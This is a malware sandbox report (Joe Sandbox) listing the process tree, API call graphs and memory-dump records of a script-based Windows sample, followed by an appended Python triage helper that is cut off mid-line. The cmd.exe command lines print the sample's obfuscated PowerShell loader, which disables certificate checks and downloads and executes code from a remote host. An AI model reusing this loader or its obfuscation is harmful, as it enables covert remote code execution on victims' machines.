Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 01:56:36
Start date: 05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"
                                                                                                                                                                                                                                                            Imagebase:0x220000
                                                                                                                                                                                                                                                            File size:147'456 bytes
                                                                                                                                                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                            Start time:01:56:43
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
                                                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                            Start time:01:56:43
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                            Start time:01:56:44
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) "
                                                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                            Start time:01:56:44
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
                                                                                                                                                                                                                                                            Imagebase:0xec0000
                                                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:23.3%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                            Signature Coverage:5.3%
                                                                                                                                                                                                                                                            Total number of Nodes:76
                                                                                                                                                                                                                                                            Total number of Limit Nodes:4

                                                                                                                                                                                                                                                            Callgraph

callgraph (rendered figure; the listing of 107 function nodes, Function_00E0AAE0 through Function_00E0B01E in the 00E0xxxx, 0103xxxx and 04CCxxxx regions, is omitted)

Executed Functions

APIs
• GetSystemInfo.KERNELBASE(?), ref: 00E0B208
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: InfoSystem
• String ID:
• API String ID: 31276548-0
• Opcode ID: a06d5c4a21f2814a883b501c1995268d9e2c56cd7a0f8a5855567938e2e6aa29
• Instruction ID: 4b7f34f1ce490cd8ea66d1fa492528d4b66f52161a6e53b7d2d4f120ebf831a2
• Opcode Fuzzy Hash: a06d5c4a21f2814a883b501c1995268d9e2c56cd7a0f8a5855567938e2e6aa29
• Instruction Fuzzy Hash: C901D1709002449FDB10CF55E9897A9FBE4EF04724F08C4AADD499F2A6D379A584CFA2

Control-flow Graph

control_flow_graph (rendered figure; basic blocks 4cc0c99-4cc0dcb, node listing omitted)
Strings
Memory Dump Source
• Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
Similarity
• API ID:
• String ID: PGj$`Ej$`Ej$e]>j^
• API String ID: 0-1012526286
• Opcode ID: 3b636ef71e2dfea77ac6b3b0e859b9f66f3dc2e7efd9570295e5d2684e94b736
• Instruction ID: e3269467aadb331a3191feb94cb077b2e76545a9f421f81d51278ef7dfc0a121
• Opcode Fuzzy Hash: 3b636ef71e2dfea77ac6b3b0e859b9f66f3dc2e7efd9570295e5d2684e94b736
• Instruction Fuzzy Hash: A2213570B042458BCB15EA7A88447AEBFD79FC9614B44883CE186DB782DF35ED028792

Control-flow Graph

control_flow_graph (rendered figure; basic blocks 4cc0ca8-4cc0dcb, node listing omitted)
Strings
Memory Dump Source
• Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
Similarity
• API ID:
• String ID: PGj$`Ej$`Ej$e]>j^
• API String ID: 0-1012526286
• Opcode ID: a82c337da5b68ae1bd4c97c977564f10524ba5ff2fd9faaa078b2be8dd5a1e0f
• Instruction ID: 696d41ad89a261696c904e3972a31cef25f2db45b1f15fc2fe54febefb05c74d
• Opcode Fuzzy Hash: a82c337da5b68ae1bd4c97c977564f10524ba5ff2fd9faaa078b2be8dd5a1e0f
• Instruction Fuzzy Hash: 8E210570B002148BCB14EB7A888466EBBD7AFC9614B44C83CD186DB782DF75ED028791

Control-flow Graph

control_flow_graph (rendered figure; basic blocks 4cc0799-4cc0b8d with calls into 4cc0ba0, 4cc0c50, 4cc0c60, 4cc0c99, 4cc0ca8, 10305e1 and 1030606; node listing omitted)
Strings
Memory Dump Source
• Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
Similarity
• API ID:
• String ID: :@fj$:@fj
• API String ID: 0-1880068426
• Opcode ID: cd152bcaad83db67d9f51d837bde215340da67eb21d7ec1fdc3115d311b11fec
• Instruction ID: 0a1d5e6221638d08fcad4c0afcaf9366925c76a23c5b2ffe9d60342519bf61fa
• Opcode Fuzzy Hash: cd152bcaad83db67d9f51d837bde215340da67eb21d7ec1fdc3115d311b11fec
• Instruction Fuzzy Hash: D4A19E30B012058FDB14EBB9D89976EB7E3EF88308F148429E90697395DF789D52CB91

Control-flow Graph

control_flow_graph (rendered figure; basic blocks e0b246-e0b34f, DuplicateHandle called in block e0b2ed-e0b2f5; node listing omitted)
APIs
• DuplicateHandle.KERNELBASE(?,00000E24), ref: 00E0B2F3
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 8c2afe1e09c10985433f053b15b9aed9434cd8fa13ad44cc3efbc6ac06889bc0
• Instruction ID: b664807efb486bec854f0fd3ed43d1b100568870f36029bd982c9fda42ae72f2
• Opcode Fuzzy Hash: 8c2afe1e09c10985433f053b15b9aed9434cd8fa13ad44cc3efbc6ac06889bc0
• Instruction Fuzzy Hash: D03174715043446FE7228B61DC45FA6BFFCEF45314F0444AAE985DB162D378A909CB71

Control-flow Graph

control_flow_graph (rendered figure; basic blocks e0ad04-e0ae03, DuplicateHandle called in block e0ada1-e0ada9; node listing omitted)
APIs
• DuplicateHandle.KERNELBASE(?,00000E24), ref: 00E0ADA7
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
                                                                                                                                                                                                                                                            • Opcode ID: 238772080e65a8d6b25e3cb00be0c8c607c4a7fb36f63abc04927e38fe301f9c
                                                                                                                                                                                                                                                            • Instruction ID: 360d1a87085d4f7015cdcf51ce22d0c810dbadf1970825c66babeac62c4b7bf4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 238772080e65a8d6b25e3cb00be0c8c607c4a7fb36f63abc04927e38fe301f9c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D31B5715043446FEB228B61CC45F67BFECEF05214F0848AAF985DB562D324A909CB71

Control-flow Graph (rendered graph image not included; legend: • Executed / • Not Executed)
control_flow_graph 179 e0a5dc-e0a656 183 e0a658 179->183 184 e0a65b-e0a667 179->184 183->184 185 e0a669 184->185 186 e0a66c-e0a675 184->186 185->186 187 e0a6c6-e0a6cb 186->187 188 e0a677-e0a69b CreateFileW 186->188 187->188 191 e0a6cd-e0a6d2 188->191 192 e0a69d-e0a6c3 188->192 191->192
APIs
• CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00E0A67D
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: d4bae6c5e420553d3443aea4afeb8cf25198d8f5a66af76992f4566e8513a7e3
• Instruction ID: 93b6c0f70338c72ab91ff7cefeef3996980bbf09ce322610b37e4e8c33bc2487
• Opcode Fuzzy Hash: d4bae6c5e420553d3443aea4afeb8cf25198d8f5a66af76992f4566e8513a7e3
• Instruction Fuzzy Hash: A9319071504344AFE721CB65DC84F62BBF8EF05214F0884AEE9859B252D375E808CB71

Control-flow Graph (rendered graph image not included; legend: • Executed / • Not Executed)
control_flow_graph 195 e0a120-e0a1f3 FindNextFileW
APIs
• FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 00E0A1C2
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: FileFindNext
• String ID:
• API String ID: 2029273394-0
• Opcode ID: 487b347d7bc0cce616a19ca2532cff14fbd769cd8bdd5c6f1a297aef4e06b18a
• Instruction ID: 7bd669865af550be6ff52fa4800ca562485711cd23101e252247bffc1f5a1299
• Opcode Fuzzy Hash: 487b347d7bc0cce616a19ca2532cff14fbd769cd8bdd5c6f1a297aef4e06b18a
• Instruction Fuzzy Hash: D921A17150D3C46FD3128B258C91BA6BFB4EF47610F0985DBD8848F693D229A919CBA2

Control-flow Graph (rendered graph image not included; legend: • Executed / • Not Executed)
control_flow_graph 200 e0a370-e0a3cf 203 e0a3d1 200->203 204 e0a3d4-e0a3dd 200->204 203->204 205 e0a3e2-e0a3e8 204->205 206 e0a3df 204->206 207 e0a3ea 205->207 208 e0a3ed-e0a404 205->208 206->205 207->208 210 e0a406-e0a419 RegQueryValueExW 208->210 211 e0a43b-e0a440 208->211 212 e0a442-e0a447 210->212 213 e0a41b-e0a438 210->213 211->210 212->213
APIs
• RegQueryValueExW.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A40C
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: d30ecafa5b9a0e6e69dad44267ef4f2ed97e0c0d4b40477756d969f65c8a85f6
• Instruction ID: 51e4808e2a77da9d6401739a7897ea791aacf03f684cde5c98b810b6febeb2b5
• Opcode Fuzzy Hash: d30ecafa5b9a0e6e69dad44267ef4f2ed97e0c0d4b40477756d969f65c8a85f6
• Instruction Fuzzy Hash: 9B217C75504344AFD721CB11CC84FA6BBE8EF05714F0884AAE9859B292D368E948CB62

Control-flow Graph (rendered graph image not included; legend: • Executed / • Not Executed)
control_flow_graph 235 e0b276-e0b2eb 239 e0b343-e0b348 235->239 240 e0b2ed-e0b2f5 DuplicateHandle 235->240 239->240 242 e0b2fb-e0b30d 240->242 243 e0b34a-e0b34f 242->243 244 e0b30f-e0b340 242->244 243->244
APIs
• DuplicateHandle.KERNELBASE(?,00000E24), ref: 00E0B2F3
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 3e8ab6ef57d88c62db527d69bf770a7cd2db7073eab6945618ab5e751d9834e6
• Instruction ID: e6f147848238de1666c7e46d18a166b37e91a4b73b2352065d159a1aea44f49e
• Opcode Fuzzy Hash: 3e8ab6ef57d88c62db527d69bf770a7cd2db7073eab6945618ab5e751d9834e6
• Instruction Fuzzy Hash: 6221B271500208AFEB219F61CC85FAAFBECEF04314F04886AE945DB251D778A5448B71

Control-flow Graph (rendered graph image not included; legend: • Executed / • Not Executed)
control_flow_graph 222 e0ad2a-e0ad9f 226 e0ada1-e0ada9 DuplicateHandle 222->226 227 e0adf7-e0adfc 222->227 229 e0adaf-e0adc1 226->229 227->226 230 e0adc3-e0adf4 229->230 231 e0adfe-e0ae03 229->231 231->230
APIs
• DuplicateHandle.KERNELBASE(?,00000E24), ref: 00E0ADA7
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 667a50f46ba1ff0696da9ff258e1986320a9e4b86a3d0e5951a8d188759d0cf9
• Instruction ID: d8347a10c9b6911fa0e5a97800ff5a045f621973ea5b2ba3aebe3d61a186294a
• Opcode Fuzzy Hash: 667a50f46ba1ff0696da9ff258e1986320a9e4b86a3d0e5951a8d188759d0cf9
• Instruction Fuzzy Hash: 51219271500308AFEB219F65DC85FABFBECEF04328F04886AF9459A551D774A5448B71

Control-flow Graph
• Nodes: 217 e0a50f-e0a563; 219 e0a566-e0a5be (GetTempPathW); 221 e0a5c4-e0a5da
• Edges: 217->219, 219->221
APIs
• GetTempPathW.KERNELBASE(?,00000E24,?,?), ref: 00E0A5B6
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: PathTemp
• String ID:
• API String ID: 2920410445-0
• Opcode ID: 339d18865bedda47c42b5149cb1a4113dcc9b8a2b5b68c200a8def2ba39afb64
• Instruction ID: 5708bf98553d514399b51096d35ef879a5c8ca471d711e861b2c4d5c28ec0cd4
• Opcode Fuzzy Hash: 339d18865bedda47c42b5149cb1a4113dcc9b8a2b5b68c200a8def2ba39afb64
• Instruction Fuzzy Hash: F42181B150D3C06FD7138B25CC51B62BFB8EF87614F0A81DBE8849B593D624A919C7B2

Control-flow Graph
• Nodes: 248 e0a850-e0a8d6; 252 e0a8d8-e0a8f8 (SetFilePointer); 253 e0a91a-e0a91f; 256 e0a921-e0a926; 257 e0a8fa-e0a917
• Edges: 248->252, 248->253, 252->256, 252->257, 253->252, 256->257
APIs
• SetFilePointer.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A8DE
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 7f1fc8804682311e7e751f0e094521ddaf74a53db229616a0d056b3ee0aa0052
• Instruction ID: 7040e363fafd967d9639ea678da5d2daedaaa6d48798a103d80361993c0f339e
• Opcode Fuzzy Hash: 7f1fc8804682311e7e751f0e094521ddaf74a53db229616a0d056b3ee0aa0052
• Instruction Fuzzy Hash: 2521A4715093846FE7228B60DC84F66BFB8EF46714F0984EAE9849F153C264A909C775

Control-flow Graph
• Nodes: 260 e0a933-e0a9b9; 264 e0a9bb-e0a9db (ReadFile); 265 e0a9fd-e0aa02; 268 e0aa04-e0aa09; 269 e0a9dd-e0a9fa
• Edges: 260->264, 260->265, 264->268, 264->269, 265->264, 268->269
APIs
• ReadFile.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A9C1
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: d35e653b17d6167e7114cfe7cae1e438998e58dff088db01f47682449fa7770f
• Instruction ID: 5bb2f023f1b1832c5e1ca5381c5ccd94a93f7180b40a9fee98d8a6b78106324d
• Opcode Fuzzy Hash: d35e653b17d6167e7114cfe7cae1e438998e58dff088db01f47682449fa7770f
• Instruction Fuzzy Hash: 4A21BF71409384AFDB22CF60CC84F96BFB8EF0A314F08849AE9849F152C234A508CB72

Control-flow Graph
• Nodes: 272 e0a5fe-e0a656; 275 e0a658; 276 e0a65b-e0a667; 277 e0a669; 278 e0a66c-e0a675; 279 e0a6c6-e0a6cb; 280 e0a677-e0a67f (CreateFileW); 282 e0a685-e0a69b; 283 e0a6cd-e0a6d2; 284 e0a69d-e0a6c3
• Edges: 272->275, 272->276, 275->276, 276->277, 276->278, 277->278, 278->279, 278->280, 279->280, 280->282, 282->283, 282->284, 283->284
APIs
• CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00E0A67D
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 1e2b55fd3dfa98cbf480eabe74e8252b99c3f91777a463e99ca626a3e22cc8b0
• Instruction ID: 9c0ef0ba1e678806ba3a9637d48178e4c864fd5441d4c7c17cca7b43e59ff194
• Opcode Fuzzy Hash: 1e2b55fd3dfa98cbf480eabe74e8252b99c3f91777a463e99ca626a3e22cc8b0
• Instruction Fuzzy Hash: E021A171500308AFE720DF65DC85F66FBE8EF08314F088469E9459B291D776E444CB76

Control-flow Graph
• Nodes: 287 e0a78f-e0a80d; 291 e0a842-e0a847; 292 e0a80f-e0a822 (GetFileType); 293 e0a824-e0a841; 294 e0a849-e0a84e
• Edges: 287->291, 287->292, 291->292, 292->293, 292->294, 294->293
APIs
• GetFileType.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A815
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: b9a88f7f6034286ab8e529c1aa79ca6528ed6e94997e3fd22da47ab642d6513a
• Instruction ID: cb3b0031727dc3daf033d0045160010e8312bd2c3c184df69b2930df398e74d6
• Opcode Fuzzy Hash: b9a88f7f6034286ab8e529c1aa79ca6528ed6e94997e3fd22da47ab642d6513a
• Instruction Fuzzy Hash: 2721DB754093846FE7128B21DC85BA2BFE8DF46314F0880DBE9848F193D268A909C775

APIs
• CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00E0AC36
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: CreatePipe
• String ID:
• API String ID: 2719314638-0
• Opcode ID: f74061bac57669c72b793fa8293eaf7bcaa9619ac95725db573be9f206856fc5
• Instruction ID: 66020012f663a22aed11faf27da299f2d717d0e140c1464c932aa4b71183f781
• Opcode Fuzzy Hash: f74061bac57669c72b793fa8293eaf7bcaa9619ac95725db573be9f206856fc5
• Instruction Fuzzy Hash: A121D4715093846FC312DB21CC95F66BFB4EF86610F1884DBD8889B293D235A919CBA2
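
Every function listed in this block was recovered from the same dump region: process index 3, base 00E0A000, "based on PE: false", with the file-handling APIs GetTempPathW, CreateFileW, GetFileType, SetFilePointer, ReadFile, CreateDirectoryW and CreatePipe called from inside it. The Python below is an added triage helper, not Joe Sandbox code; it parses the "Source File" and "APIs" records as they appear above and reports whether the region is executable private memory with no PE backing, and in what address order the call sites occur. The field layout assumed for the .sdmp name (protection in the fifth field, memory type in the seventh) is an assumption; only the base-address field is cross-checked against the record's own "Offset:" value. The sample lines are copied from the records in this section.

```python
"""Triage of Joe Sandbox 'Memory Dump Source' / 'APIs' records (added example, not Joe Sandbox code).

Assumed .sdmp layout: proc.dump.timestamp.base.protect.<unknown>.type.<unknown>.sdmp;
only the base field is confirmed against the record's own Offset value.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Memory protection and type constants from winnt.h
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXEC_PROTECTIONS = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

SDMP_RE = re.compile(  # assumed field layout, see module docstring
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$")
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>[^,\s]+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)")
API_RE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class Region:
    proc_index: int
    dump_index: int
    base: int
    protect: int
    mem_type: int
    pe_backed: bool


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int  # call-site address inside the dumped region


def parse_source(line: str) -> Region:
    """Parse one 'Source File: ..., Offset: ..., based on PE: ...' record."""
    m = SOURCE_RE.search(line)
    if m is None:
        raise ValueError("not a Memory Dump Source line")
    f = SDMP_RE.match(m.group("name"))
    if f is None:
        raise ValueError("unexpected .sdmp name layout")
    base = int(f.group("base"), 16)
    if base != int(m.group("off"), 16):  # the one field we can verify against the record
        raise ValueError("base field of .sdmp name disagrees with Offset")
    return Region(int(f.group("proc"), 16), int(f.group("dump"), 16), base,
                  int(f.group("protect"), 16), int(f.group("type"), 16),
                  m.group("pe") == "true")


def parse_api(line: str) -> ApiCall:
    """Parse one 'Api.MODULE(args), ref: ADDR' record."""
    m = API_RE.search(line)
    if m is None:
        raise ValueError("not an API line")
    return ApiCall(m.group("api"), m.group("mod"), int(m.group("ref"), 16))


def triage(region: Region, calls: list[ApiCall]) -> dict:
    """Flag executable memory with no PE backing and order the call sites by address."""
    executable = bool(region.protect & EXEC_PROTECTIONS)
    return {
        "executable": executable,
        "rwx": region.protect == PAGE_EXECUTE_READWRITE,
        "private": region.mem_type == MEM_PRIVATE,
        # Code running from private, non-image memory is the shape of an unpacked
        # or injected stage rather than of a module loaded from disk.
        "unbacked_exec": executable and not region.pe_backed and region.mem_type != MEM_IMAGE,
        "calls_in_region": all(c.ref >= region.base for c in calls),
        "apis": [c.api for c in sorted(calls, key=lambda c: c.ref)],
    }


# Records copied from the function listings above (all from the same region).
SAMPLE_SOURCE = ("• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040."
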